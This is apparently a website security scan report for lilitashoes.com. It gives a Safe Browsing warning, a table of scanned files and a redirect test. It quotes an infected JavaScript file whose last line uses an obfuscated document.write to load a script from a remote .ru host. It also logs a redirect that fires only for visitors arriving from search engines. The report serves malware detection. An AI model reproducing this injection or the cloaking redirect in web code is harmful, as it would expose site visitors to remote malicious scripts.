Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lilitashoes.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lilitashoes.com/ | 200 OK Content-Length: 1761 Content-Type: text/html | clean |
http://lilitashoes.com/AC_RunActiveContent.js | 200 OK Content-Length: 3349 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; } function AC_Generateobj(objAttrs, params, embedAttrs) { var str = '<object '; for (var i in objAttrs) str += i + '="' + objAttrs[i] + '" '; str += '>'; for (var i in params) str += '<param name="' + i + '" value="' + params[i] + '" /> '; str += '<embed '; for ( ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/IMAP.js"></scri'+'pt>'); Antivirus reports:
| ||
http://addonrock.ru/IMAP.js | 500 Can't connect to addonrock.ru:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
http://addonrock.ru/test404page.js | 500 Can't connect to addonrock.ru:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://lilitashoes.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: lilitashoes.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 07:34:27 GMT Location: http://lupypciw.burriedtreas.com/b?c1=8&c2=6135404&c3=28&c4=13310&c10=3197034&ns__t=1340611159998&ns_c=UTF-8&c8=&c7=http%3A%2F%2Flilitashoes.com%2F&c9=http%3A%2F%2Flilitashoes.com%2F Server: Apache Content-Length: 467 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: UCU=27; path=/; domain=lilitashoes.com; expires=Mon, 22-Sep-2014 08:14:27 GMT | suspicious |